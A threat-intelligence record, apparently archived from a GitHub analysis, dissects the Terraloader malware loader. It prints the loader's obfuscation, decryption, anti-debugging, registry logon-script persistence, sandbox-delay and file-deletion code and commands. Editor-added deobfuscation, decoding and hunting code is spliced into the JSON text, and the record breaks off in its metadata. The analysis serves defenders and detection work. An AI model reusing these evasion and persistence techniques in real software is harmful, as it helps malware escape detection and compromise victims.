{
	"id": "fd8a3368-862d-48d7-aa69-9b669fcf0b8c",
	"created_at": "2026-04-06T00:13:38.236697Z",
	"updated_at": "2026-04-10T03:34:23.520375Z",
	"deleted_at": null,
	"sha1_hash": "4e0e40b169a48fedd9d1aebd59f36d125273fd26",
	"title": "CyberThreatIntel/Additional Analysis/Terraloader/2021-03-25/Analysis.md at master · StrangerealIntel/CyberThreatIntel",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1155052,
	"plain_text": "CyberThreatIntel/Additional Analysis/Terraloader/2021-03-25/Analysis.md at master · StrangerealIntel/CyberThreatIntel\r\nBy StrangerealIntel\r\nArchived: 2026-04-05 20:00:27 UTC\r\nTerraloader : Congrats, you have a new fake job !\r\nThis analysis focuses on what has changed since the previous analyses and tweets, which are listed in the references:\r\n[2020-09-03] Analysis of improvement of the \"Normal\" version\r\n[2020-07-26] Code of \"Killswitch\" version\r\n[2020-07-21] Analysis of \"Killswitch\" version\r\n[2020-04-12] Analysis of improvement of the \"Normal\" version\r\n[2020-01-02] Analysis of \"Normal\" version\r\nObfuscation\r\nThe initial access vector is an XSL file that contains the obfuscated JS script. It uses several obfuscation templates whose purpose is to make the payload fully undetectable (FUD) rather than to hide the logic from an analyst: an analyst quickly notices how redundant the inserted operations are. Their only role is to perform as many arithmetic operations as possible to evade detection. For example, the calculations that compute a limit value in the decryption part serve no purpose other than forcing a detection engine to evaluate them before it reaches the real logic; every operation the engine has to process is used this way.\r\nThe templates are listed below. The number of letters and digits falls within the ranges shown, but because the loader is sold in a malware-as-a-service (MaaS) model, other builds may use larger ranges or more operations to reduce detection further:\r\n // Obfuscation patterns used\r\n var a;\r\n var b;\r\n a = [0-9]{1,3};\r\n b = a [ + - / * ] [0-9]{1,3};\r\n var a;\r\n var b;\r\n a = [a-z]{1,3};\r\n [a or b] = [a or b] + [a-z]{1,6};\r\n if ((a + b) == [a-z]{1,3}) { [a or b] = [0-9]{1,3}; }\r\n var a;\r\n var b;\r\n a = [a-z]{1,3};\r\n [a or b] = [a or b] + [a-z]{1,6};\r\n if ([a or b] == [a-z]{1,3}) { [a or b] = [0-9]{1,3}; }\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-Page 1 of 15\r\nAs explained before, it is easy to see that the code is generated from a template: the attacker uses a placeholder understood by his generator to mark where obfuscation is added to the script. I think that other existing variables fill in the payloads, like the second layer, the DLL and the document to read, in order to avoid corrupting the data of the payload.\r\n // Before obfuscation process\r\n var MatAr = [];\r\n {obfuscate me}\r\n MatAr[0] = 50;\r\n MatAr[1] = 69;\r\n [...]\r\n MatAr[24] = 50;\r\n MatAr[25] = 70;\r\n {obfuscate me}\r\n return MatAr;\r\n // After obfuscation process\r\n var MatAr = [];\r\n var a;\r\n var b;\r\n a = 418;\r\n b = a * 4;\r\n MatAr[0] = 50;\r\n MatAr[1] = 69;\r\n [...]\r\n MatAr[24] = 50;\r\n MatAr[25] = 70;\r\n var a;\r\n var b;\r\n a = 944;\r\n b = a + 1;\r\n if (b == 711) { b = 43; }\r\n return MatAr;\r\nDuplicate error or wanted obfuscation ?\r\nWhether the duplicated decryption matrix is deliberate, added to increase the obfuscation, remains an open question. In a certain logic, copying and pasting the same blocks of code and the same function names in the template does add a lot of noise that helps evade detection by AV engines.\r\nImprovements\r\nCompared to the \"Killswitch\" version, the \"Normal\" version follows the same process: decrypt the payload and run the second layer pushed into memory. The difference is that the \"Killswitch\" version checks identifiers of the processor and/or the network card and/or the user account to verify that it is running on the intended victim. If they match, the payloads are decrypted correctly and can run.\r\n
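Returning to the obfuscation templates listed under Obfuscation above: the block below is an added example, not code from the original analysis, that strips the junk statements those templates produce so that the real logic of a dumped script becomes readable. It goes slightly beyond the page in that it handles both the numeric and the string template, and it rescues any name that real code references, so a bare var declaration the loader actually uses is left alone. It assumes one statement per line, as in the dumped scripts, and the sample input is constructed from the after-obfuscation listing above plus one block produced by the string template.

```javascript
// Added example, not code from the original analysis: strip the junk statements
// inserted by the obfuscation templates (numeric and string variants) so that the
// real logic of the loader is visible again. Assumes one statement per line.

const NL = String.fromCharCode(10);          // newline, kept out of string literals
const DQ = String.fromCharCode(34);          // double quote
const IDENT = /[A-Za-z_$][A-Za-z0-9_$]*/g;
const BARE_VAR = /^[ \t]*var[ \t]+([A-Za-z_$][A-Za-z0-9_$]*)[ \t]*;[ \t]*$/;
// String literals are blanked before identifier extraction so that quoted text
// such as 'qwerty' is not mistaken for a variable name.
const STRING_LIT = new RegExp(`'[^']*'|${DQ}[^${DQ}]*${DQ}`, 'g');
const KEYWORDS = new Set(['var', 'if', 'else']);

function identifiers(line) {
  const stripped = line.replace(STRING_LIT, '');
  return (stripped.match(IDENT) || []).filter((w) => !KEYWORDS.has(w));
}

// Junk candidates are the names introduced by a bare `var x;`: the templates
// never initialise their variables in the declaration, while the real arrays
// are declared as `var MatAr = [];`.
function bareDeclarations(lines) {
  const names = new Set();
  for (const line of lines) {
    const m = line.match(BARE_VAR);
    if (m) names.add(m[1]);
  }
  return names;
}

function stripJunk(src) {
  const lines = src.split(NL).map((l) => l.replace(String.fromCharCode(13), ''));
  const junk = bareDeclarations(lines);
  let junkLine = [];
  let changed = true;
  // A statement is junk when every identifier in it is a junk candidate. Any
  // other statement that mentions a candidate rescues it (it is real state the
  // loader reads), so iterate to a fixed point before removing anything.
  while (changed) {
    changed = false;
    junkLine = lines.map((line) => {
      const ids = identifiers(line);
      return ids.length > 0 && ids.every((id) => junk.has(id));
    });
    lines.forEach((line, i) => {
      if (junkLine[i]) return;
      for (const id of identifiers(line)) {
        if (junk.delete(id)) changed = true;
      }
    });
  }
  return lines.filter((_, i) => !junkLine[i]).join(NL);
}

// Constructed sample: the after-obfuscation listing from the analysis plus one
// block produced by the string template.
const SAMPLE = [
  'var MatAr = [];',
  'var a;',
  'var b;',
  'a = 418;',
  'b = a * 4;',
  'MatAr[0] = 50;',
  'MatAr[1] = 69;',
  'MatAr[24] = 50;',
  'MatAr[25] = 70;',
  'var a;',
  'var b;',
  'a = 944;',
  'b = a + 1;',
  'if (b == 711) { b = 43; }',
  'var cq;',
  'var xz;',
  `cq = 'abc';`,
  `xz = xz + 'qwerty';`,
  `if ((cq + xz) == 'ky') { cq = 12; }`,
  'return MatAr;',
].join(NL);

const CLEANED = stripJunk(SAMPLE);
```

The fixed-point rescue is what keeps the pass safe: a loader variable such as result, declared bare and later assigned from Decrypt(), is referenced by a non-junk statement and therefore survives. The pass is line based on purpose; run a JS beautifier first if a sample packs several statements on one line.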
Hence the name \"Killswitch\": without the specific hardware information of the victim, an analyst has to find the right parameters before the payloads and the C2 infrastructure can be obtained.\r\nHere is the execution flow of the \"Normal\" version; the \"Killswitch\" version probably ends the same way once the additional decryption round keyed on the hardware information has completed:\r\n[Figure: process execution graph of the \"Normal\" version]\r\nThe main improvements of the latest version are the larger number of ciphers used in the decryption process and the anti-debugging based on exception states. For the rest the logic is unchanged: the loader brute-forces a numeric suffix appended to the key, decrypts with each candidate, and when the decrypted matrix matches the reference matrix (CompareLengthObjects compares them) a token is set to mark the decryption as finished and the payloads are run.\r\nvar Mat1 = Initmatrix1();\r\nvar Mat2 = Initmatrix2();\r\nvar Token = 0;\r\nvar s = \"\";\r\nvar n = 0;\r\nvar tmpArray = [];\r\nOpAr[0] = 74;\r\nOpAr[1] = 68;\r\nOpAr[2] = 77;\r\nOpAr[3] = 105;\r\nOpAr[4] = 115;\r\nOpAr[5] = 104;\r\nOpAr[6] = 110;\r\nOpAr[7] = 108;\r\nOpAr[8] = 80;\r\nOpAr[9] = 69;\r\nOpAr[10] = 109;\r\nOpAr[11] = 67;\r\nOpAr[12] = 120;\r\nOpAr[13] = 99;\r\nOpAr[14] = 71;\r\nOpAr[15] = 76;\r\nOpAr[16] = 68;\r\nOpAr[17] = 117;\r\nOpAr[18] = 79;\r\nOpAr[19] = 113;\r\nOpAr[20] = 119;\r\nOpAr[21] = 82;\r\nOpAr[22] = 109;\r\nOpAr[23] = 100;\r\nOpAr[24] = 75;\r\nOpAr[25] = 107;\r\nvar id = 26;\r\nvar i = 0;\r\nvar result;\r\ndo {\r\n    // candidate suffix: the decimal digits of i, converted one by one\r\n    s = (i + \"\");\r\n    n = s.length;\r\n    if (n === 1) {\r\n        OpAr[id] = SwitchVal(i);\r\n    } else 
{\r\n        tmpArray = SplitVal(s);\r\n        OpAr[id] = SwitchVal(tmpArray[0]);\r\n        switch (n) {\r\n            case 2:\r\n                OpAr[id + 1] = SwitchVal(tmpArray[1]);\r\n                break;\r\n            case 3:\r\n                OpAr[id + 1] = SwitchVal(tmpArray[1]);\r\n                OpAr[id + 2] = SwitchVal(tmpArray[2]);\r\n                break;\r\n            case 4:\r\n                OpAr[id + 1] = SwitchVal(tmpArray[1]);\r\n                OpAr[id + 2] = SwitchVal(tmpArray[2]);\r\n                OpAr[id + 3] = SwitchVal(tmpArray[3]);\r\n                break;\r\n            case 5:\r\n                OpAr[id + 1] = SwitchVal(tmpArray[1]);\r\n                OpAr[id + 2] = SwitchVal(tmpArray[2]);\r\n                OpAr[id + 3] = SwitchVal(tmpArray[3]);\r\n                OpAr[id + 4] = SwitchVal(tmpArray[4]);\r\n                break;\r\n        }\r\n    }\r\n    result = Decrypt(Mat2, OpAr, n + id);\r\n    if (CompareLengthObjects(result, Mat1) === true) {\r\n        Token = 474;\r\n    }\r\n    i = i + 1;\r\n} while (Token === 0);\r\nThe encoded payload data is first decoded by InitBase, which handles the data alignment and adds the extra steps that reorder the data into the array indexes. This routine is a basE91 decoder: FillAr looks each character up in the reference matrix RefBase (the 91-character alphabet), characters are consumed in pairs as o1 + o2 * 91, and the resulting 13 or 14 bits are shifted into an accumulator from which whole bytes are emitted.\r\nfunction InitBase(Arg) {\r\n    if (Arg) {\r\n        var lim = Arg.length;\r\n        var r = [];\r\n        var j = 0;        // bit accumulator\r\n        var i = 0;        // number of valid bits in j\r\n        var lock = -1;    // first symbol of the current pair\r\n        var o;\r\n        var index = 0;\r\n        var t = [];\r\n        t = SplitVal(Arg);\r\n        if (t) {\r\n            do {\r\n                o = FillAr(RefBase, t[index]);\r\n                if (o !== -1) {\r\n                    if (lock < 0) { lock = o; }\r\n                    else {\r\n                        lock = lock + o * 91;\r\n                        j = j | lock << i;\r\n                        if ((lock & 8191) > 88) { i = i + 13; }\r\n                        else { i = i + 14; }\r\n                        do {\r\n                            PushElement(r, j & 255);\r\n                            j = j >> 8;\r\n                            i = i - 8;\r\n                        } while (i > 7);\r\n                        lock = -1;\r\n                    }\r\n                }\r\n                index = index + 1;\r\n            } while (index < lim);\r\n            if (lock > -1) {\r\n                PushElement(r, (j | lock << i) 
& 255);\r\n            }\r\n            return (r);\r\n        }\r\n    }\r\n}\r\nNote: since the reference matrix and the two other matrices usually have the same size, there is a good chance that the offset is fixed (around 29) and only the key varies.\r\nDump the payloads\r\nOnce the key and the offset are known, the data can be extracted in one pass. After the decryption phase the data comes back as raw byte values; the following function converts them to ASCII, which is what is needed to obtain the next script layers:\r\nfunction InitDecrypt(Arg1, Arg2, Arg3) {\r\n    // Decode the basE91 text of the payload into bytes\r\n    var tmp = InitBase(Arg1);\r\n    // Decrypt the data with the key array and the offset\r\n    var r = Decrypt(tmp, Arg2, Arg3);\r\n    // Data are in raw mode (byte values)\r\n    console.log(\"r = \" + r);\r\n    // Convert the bytes to chars and join them\r\n    return JoinTab(r);\r\n}\r\nThe byte values can also be written directly to a binary file, which is how the DLL and the lure document are extracted:\r\n[io.file]::WriteAllBytes($SavePath,$Data)\r\nSecond loader and lure\r\nThis drops TerraStealer and the lure document for a fake job offer.\r\nAs in the previous analysis, the dropper keeps the same structure but has been renamed.\r\nStrangely, even though the verification later in the process can show that the host is not a victim the threat actor is interested in, there is no capability to delete the Terraloader JS scripts as an anti-forensic measure, nor to remove the persistence. This confirms that these are on-demand components rather than a fixed pack; otherwise the same logic would be applied everywhere.\r\n// Persistence by logon/logoff helper in the registry, 
loaded as a script when the session opens after th\r\nKey: HKEY_CURRENT_USER\\Environment\r\nName: UserInitMprLogonScript\r\nValue: cscripT /B /e:jsCript \"%APPDATA%\\Microsoft\\7AF60BCC.txt\"\r\nThis value is the Windows logon script mechanism (ATT&CK T1037.001, Logon Script (Windows)) rather than a Run key. Note the /e:jsCript switch: the script host is told to run a .txt file as JScript, which is worth a detection rule on its own.\r\nThe DLL writes the next payloads of the Killswitch version of Terraloader to disk, deletes the DLL (which carries a fake .ocx extension) and launches the payload by calling the msxsl.exe dropped on the compromised system.\r\nIt then runs the following commands: typeperf to read a system performance counter, used as a check for common anti-debug artefacts, and cmd to remove the .ocx from disk as mentioned above. Note that -si 600 -sc 1 requests a single sample with a 600-second interval, so the typeperf call also acts as a long delay before execution continues, which outlasts the execution window of many sandboxes.\r\ntypeperf.exe \"\\System\\Processor Queue Length\" -si 600 -sc 1\r\nC:\\Windows\\system32\\cmd.exe /c del \"C:\\Users\\admin\\AppData\\Local\\Temp\\58611.ocx\" >> NUL\r\nThe first of the two JS files then launches the second Terraloader stage through msxsl; it keeps the characters of its strings in separate variables to obfuscate the payload:\r\n var pzuunawd96 = \"\\\\\";\r\n var pzuunawd6 = \"x\";\r\n var pzuunawd5082 = \".\";\r\n var pzuunawd423 = \"e\";\r\n var pzuunawd4 = \"s\";\r\n var pzuunawd33 = \"l\";\r\n var pzuunawd66 = \"t\";\r\n var pzuunawd8 = \"M\";\r\n var pzuunawd396 = \"a\";\r\n var pzuunawd25 = \"p\";\r\nOnce the obfuscation is removed the code is readable, and a new value appears: an error code returned to the C2. This lets the group know whether the sample was opened, whether it infected a system but did not run the second layer, or whether it infected a host that failed the hardware/account verification.\r\nvar Code = 0;\r\nfunction GetActX(a) { return new ActiveXObject(a); }\r\ntry\r\n{\r\n    var ObjX = 
GetActX(\"shell.application\");\r\n    ObjX.ShellExecute(\"Msxsl.exe\", \"3850FC6E77257.txt 3850FC6E77257.txt\", \"C:\\\\Users\\\\admin\\\\AppData\\\r\n}\r\ncatch (e) { Code = 629; }\r\nThis version, like the September 2020 one, uses a fixed size for the comparison of the two objects, has no method to push elements into arrays (it goes through a global variable instead) and uses fewer ciphers in the decryption process, but it passes the number of extra cycles to add to the process as an additional argument.\r\nOne point of interest: although this is the old version, it still has the exception chains added in the latest version. Each step performs an operation on an undeclared variable, which throws a ReferenceError, and only the innermost catch block reaches the real code; this complicates debugging because a debugger set to break on exceptions stops at every level.\r\nexec = function(a) {\r\n    try {\r\n        excepval = excepval + 609;\r\n    } catch (e) {\r\n        try {\r\n            excepval2 = excepval2 / 528;\r\n        } catch (e2) {\r\n            try {\r\n                excepval3 = excepval3 * 277;\r\n            } catch (e3) {\r\n                try {\r\n                    excepval4 = excepval4 - 904;\r\n                } catch (e4) {\r\n                    return (Function(a))();\r\n                }\r\n            }\r\n        }\r\n    }\r\n};\r\ntry {\r\n    DebVal1 = DebVal1 + 830\r\n} catch (e5) {\r\n    try {\r\n        DebVal2 = DebVal2 - 529;\r\n    } catch (e6) {\r\n        try {\r\n            DebVal3 = DebVal3 / 108;\r\n        } catch (rincbz62) {\r\n            exec(InitDecrypt(PayLayer2, OpAr, off, 4937));\r\n        }\r\n    }\r\n}\r\nThe second layer still contains a function that converts an int to a char, and a second loop whose payload is only decryptable on the victim's computer.\r\n
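Before moving on to the second layer, here is a clean reimplementation of the InitBase routine shown under Improvements, which turns the basE91 text of the embedded payload back into bytes before Decrypt runs. This is an added example, not code from the original analysis: the multiply-by-91 and the 13/14-bit accumulator identify InitBase as a basE91 decoder, so the reference matrix RefBase must hold the 91-character basE91 alphabet reproduced below. The encoder is included only so that the decoder can be verified offline with a round trip; the inputs used are constructed.

```javascript
// Added example, not code from the original analysis: a clean reimplementation
// of the InitBase routine (basE91 decoding). pending = lock, acc = j,
// nbits = i and out = r in the loader's variable names.

const ALPHABET =
  'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' +
  '!#$%&()*+,./:;<=>?@[]^_`{|}~' + String.fromCharCode(34);

function base91Decode(text) {
  const out = [];
  let acc = 0;       // bit accumulator
  let nbits = 0;     // number of valid bits in acc
  let pending = -1;  // first symbol of the current pair, -1 when none
  for (const ch of text) {
    const v = ALPHABET.indexOf(ch);   // FillAr(RefBase, ch)
    if (v === -1) continue;           // characters outside the alphabet are skipped
    if (pending < 0) { pending = v; continue; }
    pending += v * 91;                // a pair carries 13 or 14 bits
    acc |= pending << nbits;
    nbits += (pending & 8191) > 88 ? 13 : 14;
    do {
      out.push(acc & 255);
      acc >>= 8;
      nbits -= 8;
    } while (nbits > 7);
    pending = -1;
  }
  if (pending > -1) out.push((acc | (pending << nbits)) & 255);  // trailing symbol
  return out;
}

// Reference basE91 encoder, present only to check the decoder by round trip.
function base91Encode(bytes) {
  let text = '';
  let acc = 0;
  let nbits = 0;
  for (const b of bytes) {
    acc |= b << nbits;
    nbits += 8;
    if (nbits > 13) {
      let v = acc & 8191;
      if (v > 88) { acc >>= 13; nbits -= 13; }
      else { v = acc & 16383; acc >>= 14; nbits -= 14; }
      text += ALPHABET[v % 91] + ALPHABET[Math.floor(v / 91)];
    }
  }
  if (nbits > 0) {
    text += ALPHABET[acc % 91];
    if (nbits > 7 || acc > 90) text += ALPHABET[Math.floor(acc / 91)];
  }
  return text;
}

// JoinTab equivalent: byte values back to a string.
function bytesToString(bytes) {
  return String.fromCharCode(...bytes);
}

function stringToBytes(s) {
  return Array.from(s, (c) => c.charCodeAt(0) & 255);
}
```

Feed base91Decode the first argument of InitDecrypt (PayLayer2 in the listing above) to get the ciphertext bytes that Decrypt consumes; the key array and offset are unchanged. If a sample uses a permuted alphabet, swap ALPHABET for the content of its RefBase and the rest of the routine still applies.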
What follows therefore cannot be observed offline, but it looks like the last stage of the JS backdoor with its configuration (parameters and the final C2 to contact) embedded. The key is built from the victim's computer name and the PROCESSOR_IDENTIFIER environment variable, and each of its characters is appended to the key array before the final payload is decrypted:\r\nfunction Getkey()\r\n{\r\n    try\r\n    {\r\n        var ActXObj1 = GetActX(\"WScript.Shell\");\r\n        var p = ActXObj1.Environment(\"PROCESS\");\r\n        var NetActX = GetActX(\"WScript.Network\");\r\n        var result = NetActX.ComputerName + p(\"PROCESSOR_IDENTIFIER\");\r\n        return result;\r\n    }\r\n    catch(e) { return false; }\r\n}\r\n[...]\r\nvar k = Getkey();\r\nShObj = \"\";\r\nproc = \"\";\r\nNetObj = \"\";\r\nIdProc = \"\";\r\nvar lim = k.length;\r\nvar tmp = k.split(\"\");\r\nAr[off] = GetCharFromInt(tmp[0]);\r\nvar i = 1;\r\ndo {\r\n    Ar[off + i] = GetCharFromInt(tmp[i]);\r\n    i = i + 1;\r\n} while (i < lim);\r\nk = \"\";\r\ntmp = [];\r\nExec(Decrypt(FinalPayload, Ar, off + lim, 50360));\r\nFIN6 or Evilnum ?\r\nThe indicators and TTPs look closer to the Evilnum group than to FIN6, which historically targeted point-of-sale (POS) systems. The choice between the two versions seems to depend on whether the group has specific information about an important victim in the hierarchy (a VIP), probably because it already has initial access through TerraTV or TerraPreter; in that case the loader only serves as a transport for pivoting.\r\nHere the loader is coupled with the dropped DLL, but sometimes only the \"Normal\" version is used, for operations without a specific target.\r\n
That may be one way of obtaining the precise information needed for the \"Killswitch\" version: from leaks, and probably from an internal compromise with the help of an employee or administrator.\r\nAnother method is possible but not confirmed: the attacker sends a single spear-phishing email with a JS script that reports the processor information to a sinkhole, then later sends Terraloader with the payload encrypted using the account and processor information as the key.\r\nHunting\r\nSince the DLL pushes the JS script and msxsl.exe to disk, both are interesting artefacts. Looking at msxsl.exe, the dropped copy always has the same hash, which is logical since the same data template is used in the MaaS model.\r\nFor example, Anyrun uses this fact and allows hunting by the executions of msxsl.exe; with strong enough confidence, the samples found this way are Terraloader:\r\n[Figure: Anyrun hunt on msxsl.exe executions]\r\nAll the references to useful artefacts can be consulted here and all the code here.\r\nCyber kill chain\r\nThe process graph summarizes the cyber kill chain used by the attacker:\r\n[Figure: cyber kill chain process graph]\r\nIndicators Of Compromise (IOC)\r\nThe IOC can be exported in JSON\r\nReferences MITRE ATT&CK Matrix\r\nEnterprise tactics | Techniques used | Ref URL\r\nExecution | Windows Management Instrumentation | https://attack.mitre.org/techniques/T1047\r\nExecution | Command-Line Interface | https://attack.mitre.org/techniques/T1059\r\nPersistence | Registry Run Keys / Startup Folder | https://attack.mitre.org/techniques/T1060\r\nDefense Evasion | Install Root Certificate | https://attack.mitre.org/techniques/T1130\r\nDiscovery | Query Registry | https://attack.mitre.org/techniques/T1012\r\nNote: T1060 and T1130 are IDs from the pre-2020 matrix (today T1547.001 and T1553.004), and the UserInitMprLogonScript persistence seen above maps more precisely to T1037.001, Logon Script (Windows).\r\n
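Following the Hunting section and the ATT&CK mapping above, the block below is an added hunting example, not code from the original analysis. It flags the stages of the chain documented on this page (a script host forced to run a .txt as JScript, msxsl.exe executed from a user-writable path or fed .txt inputs, the single delayed typeperf sample, the deletion of the fake .ocx, and the UserInitMprLogonScript value) in endpoint telemetry, then escalates a host when a high-confidence stage or two different stages are seen. The event shape is an assumption modelled on Sysmon process-creation and registry-value-set events, the host names are invented, and every event is constructed for the example.

```javascript
// Added hunting example, not code from the original analysis. Event shape is
// an assumption modelled on Sysmon process-creation / registry-value-set
// events; all sample events are constructed.

const LOGON_SCRIPT_VALUE = 'environment\\userinitmprlogonscript';

function baseName(path) {
  const cut = Math.max(path.lastIndexOf('/'), path.lastIndexOf('\\'));
  return path.slice(cut + 1).toLowerCase();
}

// User-writable locations seen in the chain (AppData, Temp); system and
// Program Files paths do not match.
function userWritable(path) {
  const p = path.toLowerCase();
  return p.includes('appdata') || p.includes('\\temp\\');
}

const RULES = [
  {
    name: 'script_host_forced_jscript_engine',
    confidence: 'medium',
    // cscript/wscript told with /e:jscript to treat a file as JScript,
    // exactly what the UserInitMprLogonScript value does with the .txt payload
    match: (e) => e.type === 'process' &&
      ['cscript.exe', 'wscript.exe'].includes(baseName(e.image)) &&
      e.commandLine.toLowerCase().includes('/e:jscript'),
  },
  {
    name: 'msxsl_from_user_path_or_txt_input',
    confidence: 'high',
    // msxsl.exe is not shipped with Windows; Terraloader drops it under AppData
    // and feeds it .txt files that are really the XSL payload
    match: (e) => e.type === 'process' && baseName(e.image) === 'msxsl.exe' &&
      (userWritable(e.image) || e.commandLine.toLowerCase().includes('.txt')),
  },
  {
    name: 'typeperf_single_delayed_sample',
    confidence: 'low',
    // one sample of Processor Queue Length after a long interval: a sleep
    match: (e) => e.type === 'process' && baseName(e.image) === 'typeperf.exe' &&
      e.commandLine.toLowerCase().includes('processor queue length') &&
      /-sc[ ]+1([ ]|$)/.test(e.commandLine),
  },
  {
    name: 'ocx_deleted_from_user_path',
    confidence: 'medium',
    match: (e) => e.type === 'process' && baseName(e.image) === 'cmd.exe' &&
      /[ ]del[ ]/i.test(e.commandLine) && /[.]ocx/i.test(e.commandLine) &&
      userWritable(e.commandLine),
  },
  {
    name: 'logon_script_environment_value',
    confidence: 'high',
    match: (e) => e.type === 'registry' &&
      e.targetObject.toLowerCase().endsWith(LOGON_SCRIPT_VALUE),
  },
];

function huntTerraloader(events) {
  const hits = [];
  for (const e of events) {
    for (const rule of RULES) {
      if (rule.match(e)) hits.push({ host: e.host, rule: rule.name, confidence: rule.confidence });
    }
  }
  // Escalate a host on any high-confidence hit, or when two different stages of
  // the chain are seen on it; a lone typeperf hit is normal admin noise.
  const perHost = new Map();
  for (const h of hits) {
    if (!perHost.has(h.host)) perHost.set(h.host, { rules: new Set(), high: false });
    const entry = perHost.get(h.host);
    entry.rules.add(h.rule);
    if (h.confidence === 'high') entry.high = true;
  }
  const escalate = [...perHost]
    .filter(([, v]) => v.high || v.rules.size >= 2)
    .map(([host]) => host);
  return { hits, escalate };
}

// Constructed telemetry: one infected workstation and one with benign activity.
const SAMPLE_EVENTS = [
  { type: 'registry', host: 'WS-0417', targetObject: 'HKU\\S-1-5-21-1\\Environment\\UserInitMprLogonScript',
    details: 'cscripT /B /e:jsCript %APPDATA%\\Microsoft\\7AF60BCC.txt' },
  { type: 'process', host: 'WS-0417', image: 'C:\\Windows\\System32\\cscript.exe',
    commandLine: 'cscripT /B /e:jsCript C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\7AF60BCC.txt' },
  { type: 'process', host: 'WS-0417', image: 'C:\\Users\\admin\\AppData\\Roaming\\Msxsl.exe',
    commandLine: 'Msxsl.exe 3850FC6E77257.txt 3850FC6E77257.txt' },
  { type: 'process', host: 'WS-0417', image: 'C:\\Windows\\System32\\typeperf.exe',
    commandLine: 'typeperf.exe \\System\\Processor Queue Length -si 600 -sc 1' },
  { type: 'process', host: 'WS-0417', image: 'C:\\Windows\\System32\\cmd.exe',
    commandLine: 'C:\\Windows\\system32\\cmd.exe /c del C:\\Users\\admin\\AppData\\Local\\Temp\\58611.ocx >> NUL' },
  { type: 'process', host: 'WS-0911', image: 'C:\\Windows\\System32\\cscript.exe',
    commandLine: 'cscript //nologo C:\\Scripts\\inventory.vbs' },
  { type: 'process', host: 'WS-0911', image: 'C:\\Windows\\System32\\typeperf.exe',
    commandLine: 'typeperf.exe \\Processor(_Total)\\% Processor Time -si 1 -sc 5' },
  { type: 'process', host: 'WS-0911', image: 'C:\\Program Files\\msxsl\\msxsl.exe',
    commandLine: 'msxsl.exe report.xml style.xsl -o report.html' },
];

const HUNT = huntTerraloader(SAMPLE_EVENTS);
```

The msxsl and logon-script rules carry the weight on their own; the typeperf rule is deliberately low confidence because administrators run that counter legitimately, and it only matters in combination with another stage on the same host.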
Links\r\nLinks Anyrun:\r\n000a5e63109b3c653d63d84d03fe474242b987bfadda9aeaa200653fd2155a31.sct\r\nSource: https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-"
	],
	"report_names": [
		"Analysis.md#terraloader--congrats-you-have-a-new-fake-job-"
	],
	"threat_actors": [
		{
			"id": "059b16f8-d4e0-4399-9add-18101a2fd298",
			"created_at": "2022-10-25T15:50:23.29434Z",
			"updated_at": "2026-04-10T02:00:05.380938Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"Evilnum"
			],
			"source_name": "MITRE:Evilnum",
			"tools": [
				"More_eggs",
				"EVILNUM",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-10T02:00:03.294222Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "12517c87-040a-4627-a3df-86ca95e5c13f",
			"created_at": "2022-10-25T16:07:23.61665Z",
			"updated_at": "2026-04-10T02:00:04.689Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"ATK 88",
				"Camouflage Tempest",
				"FIN6",
				"G0037",
				"Gold Franklin",
				"ITG08",
				"Skeleton Spider",
				"Storm-0538",
				"TAAL",
				"TAG-CR2",
				"White Giant"
			],
			"source_name": "ETDA:FIN6",
			"tools": [
				"AbaddonPOS",
				"Agentemis",
				"AmmyyRAT",
				"Anchor_DNS",
				"BlackPOS",
				"CmdSQL",
				"Cobalt Strike",
				"CobaltStrike",
				"FlawedAmmyy",
				"FrameworkPOS",
				"Grateful POS",
				"JSPSPY",
				"Kaptoxa",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LockerGoga",
				"MMon",
				"Magecart",
				"Meterpreter",
				"Mimikatz",
				"More_eggs",
				"NeverQuest",
				"POSWDS",
				"Reedum",
				"Ryuk",
				"SCRAPMINT",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Loader Stealer Module",
				"Terra Loader",
				"TerraStealer",
				"Vawtrak",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"cobeacon",
				"grabnew"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "ea7bfe06-7c23-481d-b8ba-eafa6cda3bc9",
			"created_at": "2022-10-25T15:50:23.317961Z",
			"updated_at": "2026-04-10T02:00:05.280403Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"FIN6",
				"Magecart Group 6",
				"ITG08",
				"Skeleton Spider",
				"TAAL",
				"Camouflage Tempest"
			],
			"source_name": "MITRE:FIN6",
			"tools": [
				"FlawedAmmyy",
				"GrimAgent",
				"FrameworkPOS",
				"More_eggs",
				"Cobalt Strike",
				"Windows Credential Editor",
				"AdFind",
				"PsExec",
				"LockerGoga",
				"Ryuk",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3acfb48-b04d-4d3d-88a8-836d7376fa2e",
			"created_at": "2024-06-19T02:03:08.052814Z",
			"updated_at": "2026-04-10T02:00:03.659971Z",
			"deleted_at": null,
			"main_name": "GOLD FRANKLIN",
			"aliases": [
				"FIN6 ",
				"ITG08 ",
				"MageCart Group 6 ",
				"Skeleton Spider ",
				"Storm-0538 ",
				"White Giant "
			],
			"source_name": "Secureworks:GOLD FRANKLIN",
			"tools": [
